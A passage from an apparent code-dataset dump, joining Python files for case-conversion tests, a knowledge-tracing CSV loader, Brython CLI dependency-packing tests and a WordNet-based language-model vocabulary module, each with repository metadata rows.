"the_quick_brown_fox_jumped_over_the_la_zy_do_g",
),
# Alternating character cases
("heLlo WoRld", "he_llo_wo_rld"),
],
)
def test_snake_with_default_args(input, output):
assert snakecase(input) == output
@pytest.mark.parametrize(
"input, output",
[
# With punctuation.
("Hello, world!", "HelloWorld"),
# Camel cased
("helloWorld", "HelloWorld"),
# Joined by delimeter.
("Hello-World", "HelloWorld"),
# Cobol cased
("HELLO-WORLD", "HelloWorld"),
# Without punctuation.
("Hello world", "HelloWorld"),
# Repeating single delimeter
("Hello World", "HelloWorld"),
# Repeating delimeters of different types
("Hello -__ World", "HelloWorld"),
# Wrapped in delimeter
(" hello world ", "HelloWorld"),
# End in capital letter
("hellO", "HellO"),
# Long sentence with punctuation
(
r"the quick !b@rown fo%x jumped over the laZy Do'G",
"TheQuickBrownFoxJumpedOverTheLaZyDoG",
),
# Alternating character cases
("heLlo WoRld", "HeLloWoRld"),
],
)
def test_pascal_with_default_args(input, output):
assert pascalcase(input) == output
@pytest.mark.parametrize(
"input, output",
[
# With punctuation.
("Hello, world!", "helloworld"),
# Camel cased
("helloWorld", "helloworld"),
# Joined by delimeter.
("Hello-World", "helloworld"),
# Cobol cased
("HELLO-WORLD", "helloworld"),
# Without punctuation.
("Hello world", "helloworld"),
# Repeating single delimeter
("Hello World", "helloworld"),
# Repeating delimeters of different types
("Hello -__ World", "helloworld"),
# Wrapped in delimeter
(" hello world ", "helloworld"),
# End in capital letter
("hellO", "hello"),
# Long sentence with punctuation
(
r"the quick !b@rown fo%x jumped over the laZy Do'G",
"thequickbrownfoxjumpedoverthelazydog",
),
# Alternating character cases
("heLlo WoRld", "helloworld"),
],
)
def test_flat_with_default_args(input, output):
assert flatcase(input) == output
@pytest.mark.parametrize(
"input, output",
[
# With punctuation.
("Hello, world!", "hello-world"),
# Camel cased
("helloWorld", "hello-world"),
# Joined by delimeter.
("Hello-World", "hello-world"),
# Cobol cased
("HELLO-WORLD", "hello-world"),
# Without punctuation.
("Hello world", "hello-world"),
# Repeating single delimeter
("Hello World", "hello-world"),
# Repeating delimeters of different types
("Hello -__ World", "hello-world"),
# Wrapped in delimeter
(" hello world ", "hello-world"),
# End in capital letter
("hellO", "hell-o"),
# Long sentence with punctuation
(
r"the quick !b@rown fo%x jumped over the laZy Do'G",
"the-quick-brown-fox-jumped-over-the-la-zy-do-g",
),
# Alternating character cases
("heLlo WoRld", "he-llo-wo-rld"),
],
)
def test_kebab_with_default_args(input, output):
assert kebabcase(input) == output
@pytest.mark.parametrize(
"input, output",
[
# With punctuation.
("Hell9o, world!", "hell9oWorld"),
("0Hello, world!", "0helloWorld"),
("Hello, world!0", "helloWorld0"),
],
)
def test_with_numbers(input, output):
assert camelcase(input) == output
@pytest.mark.parametrize(
"input, output",
[
# With punctuation.
("Hello, world!", "hello,World!"),
],
)
def test_no_strip_punctuation(input, output):
assert camelcase(input, strip_punctuation=False) == output
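

# Minimal demo (not part of the original suite): running this module directly
# prints the tested conversions side by side.  Assumes the case functions
# exercised above are importable at module scope.
if __name__ == "__main__":
    sample = "Hello, world!"
    for func in (camelcase, pascalcase, snakecase, kebabcase, flatcase):
        print(f"{func.__name__}({sample!r}) -> {func(sample)!r}")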
| 30.033962 | 64 | 0.562508 | 789 | 7,959 | 5.557668 | 0.108999 | 0.207526 | 0.099202 | 0.132269 | 0.940707 | 0.933637 | 0.886431 | 0.886431 | 0.886431 | 0.873204 | 0 | 0.001084 | 0.304561 | 7,959 | 264 | 65 | 30.147727 | 0.791147 | 0.226913 | 0 | 0.257485 | 0 | 0.011976 | 0.387947 | 0.048082 | 0 | 0 | 0 | 0 | 0.053892 | 1 | 0.053892 | false | 0 | 0.011976 | 0 | 0.065868 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ba855ea58adb20a0ef41d911689546b106b75c62 | 5,280 | py | Python | utils/data_helpers.py | shshen-closer/LPKT_tensorflow_version | 3236b005315bc8aca34ca31e60bb19bc566983a3 | [
"Apache-2.0"
] | 1 | 2022-03-29T06:47:15.000Z | 2022-03-29T06:47:15.000Z | utils/data_helpers.py | shshen-closer/LPKT_tensorflow_version | 3236b005315bc8aca34ca31e60bb19bc566983a3 | [
"Apache-2.0"
] | null | null | null | utils/data_helpers.py | shshen-closer/LPKT_tensorflow_version | 3236b005315bc8aca34ca31e60bb19bc566983a3 | [
"Apache-2.0"
] | null | null | null | # -*- coding:utf-8 -*-
__author__ = 'shshen'
import os
import random
import csv
import logging
import numpy as np


def logger_fn(name, input_file, level=logging.INFO):
    """Create a named logger that writes timestamped records to ``input_file``,
    creating the log directory on demand."""
    tf_logger = logging.getLogger(name)
tf_logger.setLevel(level)
log_dir = os.path.dirname(input_file)
if not os.path.exists(log_dir):
os.makedirs(log_dir)
fh = logging.FileHandler(input_file, mode='w')
formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
tf_logger.addHandler(fh)
return tf_logger
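

# Example (illustrative only): create a file-backed logger, then log through
# the standard ``logging`` API:
#
#     train_logger = logger_fn("training", "logs/train.log")
#     train_logger.info("epoch 1 started")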


def read_data_from_csv_file(fileName):
    """Read student interaction records (three CSV rows per student) and
    split sequences longer than ``max_num_problems`` into chunks."""
    rows = []
    max_skill_num = 0
    max_num_problems = 116
with open(fileName, "r") as csvfile:
reader = csv.reader(csvfile, delimiter=',')
for row in reader:
rows.append(row)
'''
for indx in range(0, len(rows)):
if (indx + 1 )% 3 == 0:
rand = random.randint(0, len(rows[indx]) - 1)
if int(rows[indx][rand]) == 1:
rows[indx][rand] = 0
if int(rows[indx][rand]) == 0:
rows[indx][rand] = 1
'''
    index = 0
    print("the number of rows is " + str(len(rows)))
    tuple_rows = []
    # turn each 3-row record into a (length, skills, answers) tuple
while(index < len(rows)-1):
problems_num = int(rows[index][0])
tmp_max_skill = max(map(int, rows[index+1]))
'''
cc = []
for item in rows[index+2]:
cc.append(int(item))
a_r = round(sum(cc) / problems_num, 2)
if a_r == 0.0 or a_r == 1.0:
index += 3
continue
'''
if(tmp_max_skill > max_skill_num):
max_skill_num = tmp_max_skill
if(problems_num <= 2):
index += 3
else:
if problems_num > max_num_problems:
count = problems_num // max_num_problems
iii = 0
while(iii <= count):
if iii != count:
tup = (max_num_problems, rows[index+1][iii * max_num_problems : (iii+1)*max_num_problems], rows[index+2][iii * max_num_problems : (iii+1)*max_num_problems])
elif problems_num - iii*max_num_problems > 2:
tup = (problems_num - iii*max_num_problems, rows[index+1][iii * max_num_problems : (iii+1)*max_num_problems], rows[index+2][iii * max_num_problems : (iii+1)*max_num_problems])
else:
break
tuple_rows.append(tup)
iii += 1
index += 3
else:
tup = (problems_num, rows[index+1], rows[index+2])
tuple_rows.append(tup)
index += 3
    # shuffle the tuples so training batches mix students
    random.shuffle(tuple_rows)
    print("The number of students is", len(tuple_rows))
    print("Finish reading data")
    return tuple_rows, max_num_problems, max_skill_num + 1


def read_test_data_from_csv_file(fileName):
    """Same as ``read_data_from_csv_file`` but preserves the original student
    order (no shuffling) for deterministic evaluation."""
    rows = []
    max_skill_num = 0
    max_num_problems = 116
with open(fileName, "r") as csvfile:
reader = csv.reader(csvfile, delimiter=',')
for row in reader:
rows.append(row)
'''
for indx in range(0, len(rows)):
if (indx + 1 )% 3 == 0:
rand = random.randint(0, len(rows[indx]) - 1)
if int(rows[indx][rand]) == 1:
rows[indx][rand] = 0
if int(rows[indx][rand]) == 0:
rows[indx][rand] = 1
'''
    index = 0
    print("the number of rows is " + str(len(rows)))
    tuple_rows = []
    # turn each 3-row record into a (length, skills, answers) tuple
while(index < len(rows)-1):
problems_num = int(rows[index][0])
tmp_max_skill = max(map(int, rows[index+1]))
'''
cc = []
for item in rows[index+2]:
cc.append(int(item))
a_r = round(sum(cc) / problems_num, 2)
if a_r == 0.0 or a_r == 1.0:
index += 3
continue
'''
if(tmp_max_skill > max_skill_num):
max_skill_num = tmp_max_skill
if(problems_num <= 2):
index += 3
else:
if problems_num > max_num_problems:
count = problems_num // max_num_problems
iii = 0
while(iii <= count):
if iii != count:
tup = (max_num_problems, rows[index+1][iii * max_num_problems : (iii+1)*max_num_problems], rows[index+2][iii * max_num_problems : (iii+1)*max_num_problems])
elif problems_num - iii*max_num_problems > 2:
tup = (problems_num - iii*max_num_problems, rows[index+1][iii * max_num_problems : (iii+1)*max_num_problems], rows[index+2][iii * max_num_problems : (iii+1)*max_num_problems])
else:
break
tuple_rows.append(tup)
iii += 1
index += 3
else:
tup = (problems_num, rows[index+1], rows[index+2])
tuple_rows.append(tup)
index += 3
    # shuffle disabled so evaluation keeps the original student order
    # random.shuffle(tuple_rows)
    print("The number of students is", len(tuple_rows))
    print("Finish reading data")
    return tuple_rows, max_num_problems, max_skill_num + 1
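

# Usage sketch (illustrative): both loaders expect each student to occupy
# three consecutive CSV rows -- interaction count, skill ids, and 0/1
# correctness flags:
#
#     3
#     12,7,12
#     1,0,1
#
#     tuples, max_len, num_skills = read_data_from_csv_file("train.csv")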
| 35.2 | 199 | 0.532386 | 692 | 5,280 | 3.851156 | 0.153179 | 0.067542 | 0.157599 | 0.076548 | 0.851782 | 0.851782 | 0.851782 | 0.851782 | 0.851782 | 0.851782 | 0 | 0.025203 | 0.346212 | 5,280 | 149 | 200 | 35.436242 | 0.746813 | 0.022159 | 0 | 0.791667 | 0 | 0 | 0.0453 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03125 | false | 0 | 0.052083 | 0 | 0.114583 | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ba8875cf74f5bed2f68e52cf007749b41c42093d | 3,935 | py | Python | tests/test_packdependencies.py | pylover/brythoncli | 4a4b43e1c407b32437c006ed9d6933b9ec3bb8fd | [
"MIT"
] | null | null | null | tests/test_packdependencies.py | pylover/brythoncli | 4a4b43e1c407b32437c006ed9d6933b9ec3bb8fd | [
"MIT"
] | null | null | null | tests/test_packdependencies.py | pylover/brythoncli | 4a4b43e1c407b32437c006ed9d6933b9ec3bb8fd | [
"MIT"
] | null | null | null | from os import path
from bddcli import status, stdout, stderr


def test_packdependencies_simple(app, tempstruct, here, sortlines):
temproot = tempstruct(**{
'foo': {
'__init__.py': 'i = 10',
'baz.py': 'i = 11',
},
'brython_stdlib.js': open(path.join(here, 'stuff/brython_stdlib.js'))
})
outfile = path.join(temproot, 'brython_modules.js')
with app(f'-C {temproot} pack-deps'):
assert stderr == ''
assert status == 0
assert sortlines(stdout) == sortlines('''\
Create brython_modules.js with all the modules used by the application
Finding packages...
Searching brython_stdlib.js...
''')
    assert path.exists(outfile)


def test_packdependencies_outputdirectory(app, tempstruct, here, sortlines):
temproot = tempstruct(**{
'foo': {
'__init__.py': 'i = 10',
'baz.py': 'i = 11',
},
'brython_stdlib.js': open(path.join(here, 'stuff/brython_stdlib.js'))
})
destdir = tempstruct()
outfile = path.join(destdir, 'brython_modules.js')
with app(f'-C {temproot} pack-deps --output {destdir}'):
assert stderr == ''
assert status == 0
assert sortlines(stdout) == sortlines('''\
Create brython_modules.js with all the modules used by the application
Finding packages...
Searching brython_stdlib.js...
''')
    assert path.exists(outfile)


def test_packdependencies_filename(app, tempstruct, here, sortlines):
temproot = tempstruct(**{
'foo': {
'__init__.py': 'i = 10',
'baz.py': 'import csv',
},
'brython_stdlib.js': open(path.join(here, 'stuff/brython_stdlib.js'))
})
outfile = path.join(temproot, 'libs.js')
with app(f'-C {temproot} pack-deps --filename libs.js'):
assert stderr == ''
assert status == 0
assert sortlines(stdout) == sortlines('''\
Create brython_modules.js with all the modules used by the application
Finding packages...
Searching brython_stdlib.js...
''')
assert path.exists(outfile)
with open(outfile) as f:
content = f.read()
        assert 'csv' in content


def test_packdependencies_searchdirectory(app, tempstruct, here, sortlines):
temproot = tempstruct(**{
'foo': {
'__init__.py': 'i = 10',
'baz.py': 'i = 11',
},
'brython_stdlib.js': open(path.join(here, 'stuff/brython_stdlib.js'))
})
destdir = tempstruct()
outfile = path.join(destdir, 'brython_modules.js')
stdlib = temproot
with app(f'-C {destdir} deps --search {temproot}/foo --stdlib {stdlib}'):
print(stderr)
assert stderr == ''
assert status == 0
assert sortlines(stdout) == sortlines('''\
Create brython_modules.js with all the modules used by the application
Finding packages...
Searching brython_stdlib.js...
''')
    assert path.exists(outfile)


def test_packdependencies_exclude(app, tempstruct, here, sortlines):
temproot = tempstruct(**{
'foo': {
'__init__.py': 'i = 10',
'baz.py': 'import colorsys',
},
'bar.py': 'import this',
'qux.py': 'import keyword',
'brython_stdlib.js': open(path.join(here, 'stuff/brython_stdlib.js'))
})
outfile = path.join(temproot, 'brython_modules.js')
with app(f'-C {temproot} deps --exclude bar.py'):
assert stderr == ''
assert status == 0
assert sortlines(stdout) == sortlines('''\
Create brython_modules.js with all the modules used by the application
Finding packages...
Searching brython_stdlib.js...
''')
assert path.exists(outfile)
with open(outfile) as f:
content = f.read()
# Do not search over big content.
assert len(content) < 3000
assert 'colorsys' in content
assert 'this' not in content
assert 'keyword' in content
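

# The fixtures used above (``app``, ``tempstruct``, ``here``, ``sortlines``)
# come from the project's conftest and are not shown here.  As a rough,
# hypothetical illustration of what ``tempstruct`` does -- materialize a
# nested dict as files and directories under a temp root:
def _materialize_tree(root, tree):
    import os
    for name, value in tree.items():
        target = os.path.join(root, name)
        if isinstance(value, dict):
            os.makedirs(target, exist_ok=True)
            _materialize_tree(target, value)
        else:
            # File objects (as passed above) are read; plain strings are
            # written verbatim.
            data = value.read() if hasattr(value, "read") else value
            with open(target, "w") as fh:
                fh.write(data)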
| 31.230159 | 77 | 0.607624 | 454 | 3,935 | 5.147577 | 0.162996 | 0.08344 | 0.096277 | 0.068464 | 0.810869 | 0.810869 | 0.810869 | 0.810869 | 0.799315 | 0.799315 | 0 | 0.008509 | 0.253367 | 3,935 | 125 | 78 | 31.48 | 0.78693 | 0.007878 | 0 | 0.728972 | 0 | 0 | 0.341363 | 0.029472 | 0 | 0 | 0 | 0 | 0.233645 | 1 | 0.046729 | false | 0 | 0.056075 | 0 | 0.102804 | 0.009346 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
033e89f709bab5c283628e54240f94258598d7db | 23,208 | py | Python | src/utils/vocabulary.py | richardbaihe/robustLM | fb36aa08cd886ad98f431647d9cb128879bb4382 | [
"MIT"
] | 1 | 2022-03-21T15:12:58.000Z | 2022-03-21T15:12:58.000Z | src/utils/vocabulary.py | richardbaihe/robustLM | fb36aa08cd886ad98f431647d9cb128879bb4382 | [
"MIT"
] | null | null | null | src/utils/vocabulary.py | richardbaihe/robustLM | fb36aa08cd886ad98f431647d9cb128879bb4382 | [
"MIT"
] | null | null | null | import os
from collections import Counter, OrderedDict, defaultdict
import torch
import nltk
from nltk.corpus import wordnet as wn
from tokenizers import Tokenizer


class Vocab(object):
def __init__(self, special=[], min_freq=1, max_size=None, lower_case=True,
delimiter=None, vocab_file=None):
self.counter = Counter()
self.special = special
self.min_freq = min_freq
self.max_size = max_size
self.lower_case = lower_case
self.delimiter = delimiter
self.vocab_file = vocab_file
self.cl_root_tokens = []
self.cl_leaf_tokens = []
self.word2class = {}
self.class2words = defaultdict(list)
self.word2class_dict = defaultdict(dict)

    def tokenize(self, line, add_eos=False, add_double_eos=False, add_sent_eos=False, char_level=False):
        """Split ``line`` into a list of symbols, optionally lower-cased,
        character-encoded, and padded with end-of-sequence markers."""
        line = line.strip()
if char_level:
line = ' '.join([str(ord(c)) for c in line])
# convert to lower case
if self.lower_case:
line = line.lower()
# empty delimiter '' will evaluate False
if self.delimiter == '':
symbols = line
else:
symbols = line.split(self.delimiter)
if add_sent_eos:
symbols = symbols + ['<sent_eos>']
if add_double_eos: # lm1b
return ['<S>'] + symbols + ['<S>']
elif add_eos:
return symbols + ['<eos>']
else:
return symbols
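
    # Example behavior (illustrative): with the defaults above
    # (``lower_case=True``, whitespace delimiter),
    #
    #     vocab.tokenize("Hello World", add_eos=True)
    #     # -> ['hello', 'world', '<eos>']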
def count_file(self, path, verbose=False, add_eos=False, sega=False, sent_eos=False, char_level=False):
if verbose:
print('counting file {} ...'.format(path))
assert os.path.exists(path)
with open(path, 'r', encoding='utf-8') as f:
for idx, line in enumerate(f):
if verbose and idx > 0 and idx % 500000 == 0:
print(' line {}'.format(idx))
if sega:
nltk_sents = nltk.tokenize.sent_tokenize(line)
for sent in nltk_sents:
symbols = self.tokenize(
sent, add_eos=add_eos, add_sent_eos=sent_eos, char_level=char_level)
self.counter.update(symbols)
else:
symbols = self.tokenize(
line, add_eos=add_eos, add_sent_eos=sent_eos, char_level=char_level)
self.counter.update(symbols)
def count_cl_file(self, path, verbose=False, add_eos=False, sega=False, sent_eos=False, char_level=False):
if verbose:
print('counting cl file {} ...'.format(path))
if not os.path.exists(path):
print("found no cl files to count")
return
temp_counter = Counter()
with open(path, 'r', encoding='utf-8') as f:
for idx, line in enumerate(f):
if verbose and idx > 0 and idx % 500000 == 0:
print(' line {}'.format(idx))
symbols = self.tokenize(
line, add_eos=add_eos, add_sent_eos=sent_eos, char_level=char_level)
temp_counter.update(symbols)
self.cl_root_tokens = list((temp_counter-self.counter).keys())
self.cl_leaf_tokens = list((self.counter-temp_counter).keys())
self.counter = self.counter | temp_counter
def _build_from_file(self, vocab_file):
self.idx2sym = []
self.sym2idx = OrderedDict()
with open(vocab_file, 'r', encoding='utf-8') as f:
for line in f:
symb = line.strip().split()[0]
self.add_symbol(symb)
self.unk_idx = self.sym2idx['<UNK>']
def build_vocab(self):
if self.vocab_file:
print('building vocab from {}'.format(self.vocab_file))
self._build_from_file(self.vocab_file)
print('final vocab size {}'.format(len(self)))
else:
print('building vocab with min_freq={}, max_size={}'.format(
self.min_freq, self.max_size))
self.idx2sym = []
self.sym2idx = OrderedDict()
for sym in self.special:
self.add_special(sym)
for sym, cnt in self.counter.most_common(self.max_size):
if cnt < self.min_freq:
break
self.add_symbol(sym)
print('final vocab size {} from {} unique tokens'.format(
len(self), len(self.counter)))
if self.cl_root_tokens:
self.cl_root_tokens = [self.get_idx(
sym) for sym in self.cl_root_tokens]
self.cl_leaf_tokens = [self.get_idx(
sym) for sym in self.cl_leaf_tokens]
def build_vocab_hypernym_last(self):
if self.vocab_file:
print('building vocab from {}'.format(self.vocab_file))
self._build_from_file(self.vocab_file)
print('final vocab size {}'.format(len(self)))
else:
print('building vocab with min_freq={}, max_size={}'.format(
self.min_freq, self.max_size))
self.idx2sym = []
self.sym2idx = OrderedDict()
for sym in self.special:
self.add_special(sym)
hypernym_tokens = self.cl_root_tokens
for sym, cnt in self.counter.most_common(self.max_size):
if cnt < self.min_freq:
break
if sym in hypernym_tokens:
continue
self.add_symbol(sym)
for h_token in hypernym_tokens:
self.add_symbol(h_token)
print('final vocab size {} from {} unique tokens'.format(
len(self), len(self.counter)))
if self.cl_root_tokens:
self.cl_root_tokens = [self.get_idx(
sym) for sym in self.cl_root_tokens]
self.cl_leaf_tokens = [self.get_idx(
sym) for sym in self.cl_leaf_tokens]
def build_vocab_with_cl_order(self):
self.idx2sym = []
self.sym2idx = OrderedDict()
for sym in self.cl_root_tokens:
self.add_symbol(sym)
for sym in self.special:
self.add_special(sym)
add_leaf_flag = True
for sym, cnt in self.counter.most_common(self.max_size):
if cnt < self.min_freq:
break
if add_leaf_flag and len(self.idx2sym) == 20000:
for _sym in self.cl_leaf_tokens:
self.add_symbol(_sym)
add_leaf_flag = False
if add_leaf_flag and sym in self.cl_leaf_tokens:
continue
self.add_symbol(sym)
print('final vocab size {} from {} unique tokens'.format(
len(self), len(self.counter)))
if self.cl_root_tokens:
self.cl_root_tokens = [self.get_idx(
sym) for sym in self.cl_root_tokens]
self.cl_leaf_tokens = [self.get_idx(
sym) for sym in self.cl_leaf_tokens]

    def get_wn_replaced_dict(self, synset_layer=5, ignore_freqency_threshold=6000, replaced_with_new_symbol=True,
                             min_tokens_per_hypernym=0):
        """Map infrequent tokens to the WordNet hypernym found ``synset_layer``
        levels below the root, filling the word->class / class->words maps."""
        word2class = {}
        class2words = defaultdict(list)
for k, cnt in self.counter.most_common(self.max_size):
if cnt >= ignore_freqency_threshold:
continue
if cnt < self.min_freq:
break
continue_for_k = True
for synset in wn.synsets(k):
paths = synset.hypernym_paths()
for path in paths:
if len(path) < synset_layer+1:
continue
else:
hypernym_name = path[synset_layer].name()
if '.n.' not in hypernym_name:
continue
                        if not replaced_with_new_symbol:
                            # The original line ended in ``.split('')``, which
                            # raises ValueError (empty separator); keep only
                            # the synset-name prefix.  Note the result of this
                            # branch is currently unused below.
                            hypernym_name = hypernym_name.split('.')[0]
                        class2words[path[synset_layer].name()].append(k)
                        word2class[k] = path[synset_layer].name()
# self.counter.update([path[synset_layer].name()]*cnt)
self.counter.update([path[synset_layer].name()])
continue_for_k = False
break
if not continue_for_k:
break
for k, v in class2words.items():
if len(v) >= min_tokens_per_hypernym:
self.class2words[k].extend(v)
for token in v:
self.word2class[token] = k
            else:
                self.counter[k] = 0
for k, v in self.class2words.items():
self.cl_root_tokens.append(k)
self.cl_leaf_tokens.extend(v)
self.cl_leaf_tokens = list(set(self.cl_leaf_tokens))
# self.vocab.cl_root_tokens = list(self.vocab.class2words.keys())
# self.vocab.cl_leaf_tokens = list(self.vocab.word2class.keys())
def get_wn_replaced_dict_list(self, min_synset_layer=4, max_synset_layer=5, ignore_freqency_threshold=6000, replaced_with_new_symbol=True):
for k, cnt in self.counter.most_common(self.max_size):
if cnt >= ignore_freqency_threshold:
continue
if cnt < self.min_freq:
break
continue_for_k = True
for synset in wn.synsets(k):
paths = synset.hypernym_paths()
for path in paths:
if len(path) < max_synset_layer+1:
continue
else:
hypernym_name = path[max_synset_layer].name()
if '.n.' not in hypernym_name:
continue
for synset_layer in range(min_synset_layer, max_synset_layer+1):
hypernym_name = path[synset_layer].name()
self.class2words[hypernym_name].append(
k)
self.word2class_dict[synset_layer][k] = hypernym_name
self.counter.update([hypernym_name])
continue_for_k = False
break
if not continue_for_k:
break
for k, v in self.class2words.items():
self.cl_root_tokens.append(k)
self.cl_leaf_tokens.extend(v)
self.cl_leaf_tokens = list(set(self.cl_leaf_tokens))
# self.vocab.cl_root_tokens = list(self.vocab.class2words.keys())
# self.vocab.cl_leaf_tokens = list(self.vocab.word2class.keys())
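
    # Illustrative WordNet lookup behind the two ``get_wn_replaced_*`` methods
    # above (assumes the NLTK wordnet corpus is installed):
    #
    #     path = wn.synsets("dog")[0].hypernym_paths()[0]
    #     path[5].name()  # a noun synset name, e.g. 'organism.n.01'
    #
    # Rare tokens are mapped to the synset found ``synset_layer`` steps below
    # the root of such a path.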
def encode_file(self, path, ordered=False, verbose=False, add_eos=True,
add_double_eos=False, add_sent_eos=False):
if verbose:
print('encoding file {} ...'.format(path))
assert os.path.exists(path)
encoded = []
with open(path, 'r', encoding='utf-8') as f:
for idx, line in enumerate(f):
if verbose and idx > 0 and idx % 500000 == 0:
print(' line {}'.format(idx))
symbols = self.tokenize(line, add_eos=add_eos,
add_double_eos=add_double_eos, add_sent_eos=add_sent_eos)
encoded.append(self.convert_to_tensor(symbols))
if ordered:
encoded = torch.cat(encoded)
return encoded
def encode_file_plus(self, path, ordered=False, verbose=False, add_eos=True,
add_double_eos=False, add_sent_eos=False):
if verbose:
print('encoding file {} ...'.format(path))
assert os.path.exists(path)
encoded = []
encoded_cl = []
with open(path, 'r', encoding='utf-8') as f:
for idx, line in enumerate(f):
if verbose and idx > 0 and idx % 500000 == 0:
print(' line {}'.format(idx))
symbols = self.tokenize(line, add_eos=add_eos,
add_double_eos=add_double_eos, add_sent_eos=add_sent_eos)
cl_symbols = [self.word2class[x]
if x in self.word2class else x for x in symbols]
encoded.append(self.convert_to_tensor(symbols))
encoded_cl.append(self.convert_to_tensor(cl_symbols))
if ordered:
encoded = torch.cat(encoded)
encoded_cl = torch.cat(encoded_cl)
return encoded, encoded_cl
def encode_sents(self, sents, ordered=False, verbose=False):
if verbose:
print('encoding {} sents ...'.format(len(sents)))
encoded = []
for idx, symbols in enumerate(sents):
if verbose and idx > 0 and idx % 500000 == 0:
print(' line {}'.format(idx))
encoded.append(self.convert_to_tensor(symbols))
if ordered:
encoded = torch.cat(encoded)
return encoded
def add_special(self, sym):
if sym not in self.sym2idx:
self.idx2sym.append(sym)
self.sym2idx[sym] = len(self.idx2sym) - 1
setattr(self, '{}_idx'.format(sym.strip('<>')), self.sym2idx[sym])
def add_symbol(self, sym):
if sym not in self.sym2idx:
self.idx2sym.append(sym)
self.sym2idx[sym] = len(self.idx2sym) - 1
def get_sym(self, idx):
assert 0 <= idx < len(self), 'Index {} out of range'.format(idx)
return self.idx2sym[idx]
def get_idx(self, sym):
if sym in self.sym2idx:
return self.sym2idx[sym]
else:
# print('encounter unk {}'.format(sym))
assert '<eos>' not in sym
assert hasattr(self, 'unk_idx')
return self.sym2idx.get(sym, self.unk_idx)
def get_symbols(self, indices):
return [self.get_sym(idx) for idx in indices]
def get_indices(self, symbols):
return [self.get_idx(sym) for sym in symbols]
def convert_to_tensor(self, symbols):
return torch.LongTensor(self.get_indices(symbols))
def convert_to_sent(self, indices, exclude=None):
if exclude is None:
return ' '.join([self.get_sym(idx) for idx in indices])
else:
return ' '.join([self.get_sym(idx) for idx in indices if idx not in exclude])
def __len__(self):
return len(self.idx2sym)
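

# Usage sketch (illustrative, not from the original project): build a
# word-level vocabulary from a corpus and encode it as one LongTensor stream.
#
#     vocab = Vocab(special=['<eos>', '<unk>'])
#     vocab.count_file('train.txt', add_eos=True)
#     vocab.build_vocab()
#     ids = vocab.encode_file('train.txt', ordered=True, add_eos=True)
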
class SegaVocab(Vocab):
def __init__(self, special=[], min_freq=0, max_size=None, lower_case=True,
delimiter=None, vocab_file=None):
super().__init__(special, min_freq, max_size, lower_case,
delimiter, vocab_file)
def encode_file(self, path, ordered=False, verbose=False, add_eos=True,
add_double_eos=False, add_sent_eos=False, char_level=False):
if verbose:
print('encoding file {} ...'.format(path))
assert os.path.exists(path)
encoded = []
p = []
s = []
t = []
index_p = 0
index_s = 0
index_t = 0
with open(path, 'r', encoding='utf-8') as f:
for idx, line in enumerate(f):
if verbose and idx > 0 and idx % 500000 == 0:
print(' line {}'.format(idx))
if line.strip() == '':
continue
sents = nltk.tokenize.sent_tokenize(line)
symbols = []
para_pos = []
sent_pos = []
token_pos = []
for i, sent in enumerate(sents):
if i == len(sents)-1:
sent_symbol = self.tokenize(sent, add_eos=add_eos, add_double_eos=add_double_eos,
add_sent_eos=add_sent_eos, char_level=char_level)
else:
sent_symbol = self.tokenize(
sent, add_sent_eos=add_sent_eos, char_level=char_level)
symbols.extend(sent_symbol)
para_pos.extend([index_p]*len(sent_symbol))
sent_pos.extend([index_s]*len(sent_symbol))
token_pos.extend(range(index_t, index_t+len(sent_symbol)))
index_s += 1
index_t += len(sent_symbol)
index_p += 1
# symbols = self.tokenize(line, add_eos=add_eos,
# add_double_eos=add_double_eos)
encoded.append(self.convert_to_tensor(symbols))
p.append(torch.LongTensor(para_pos))
s.append(torch.LongTensor(sent_pos))
t.append(torch.LongTensor(token_pos))
if ordered:
encoded = torch.cat(encoded)
p = torch.cat(p)
s = torch.cat(s)
t = torch.cat(t)
return (encoded, p, s, t)
def encode_file_plus(self, path, ordered=False, verbose=False, add_eos=True,
add_double_eos=False, add_sent_eos=False, char_level=False):
if verbose:
print('encoding file {} ...'.format(path))
assert os.path.exists(path)
encoded = []
encoded_cl = []
p = []
s = []
t = []
index_p = 0
index_s = 0
index_t = 0
with open(path, 'r', encoding='utf-8') as f:
for idx, line in enumerate(f):
if verbose and idx > 0 and idx % 500000 == 0:
print(' line {}'.format(idx))
if line.strip() == '':
continue
sents = nltk.tokenize.sent_tokenize(line)
symbols = []
para_pos = []
sent_pos = []
token_pos = []
for i, sent in enumerate(sents):
if i == len(sents)-1:
sent_symbol = self.tokenize(sent, add_eos=add_eos, add_double_eos=add_double_eos,
add_sent_eos=add_sent_eos, char_level=char_level)
else:
sent_symbol = self.tokenize(
sent, add_sent_eos=add_sent_eos, char_level=char_level)
symbols.extend(sent_symbol)
para_pos.extend([index_p]*len(sent_symbol))
sent_pos.extend([index_s]*len(sent_symbol))
token_pos.extend(range(index_t, index_t+len(sent_symbol)))
index_s += 1
index_t += len(sent_symbol)
cl_symbols = [self.word2class[x]
if x in self.word2class else x for x in symbols]
index_p += 1
# symbols = self.tokenize(line, add_eos=add_eos,
# add_double_eos=add_double_eos)
encoded_cl.append(self.convert_to_tensor(cl_symbols))
encoded.append(self.convert_to_tensor(symbols))
p.append(torch.LongTensor(para_pos))
s.append(torch.LongTensor(sent_pos))
t.append(torch.LongTensor(token_pos))
if ordered:
encoded = torch.cat(encoded)
encoded_cl = torch.cat(encoded_cl)
p = torch.cat(p)
s = torch.cat(s)
t = torch.cat(t)
return (encoded, p, s, t), encoded_cl
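

# Illustrative note: ``SegaVocab.encode_file`` returns four aligned
# LongTensors -- token ids plus segment-aware positions: the paragraph index
# is constant within a line, the sentence index increments per sentence, and
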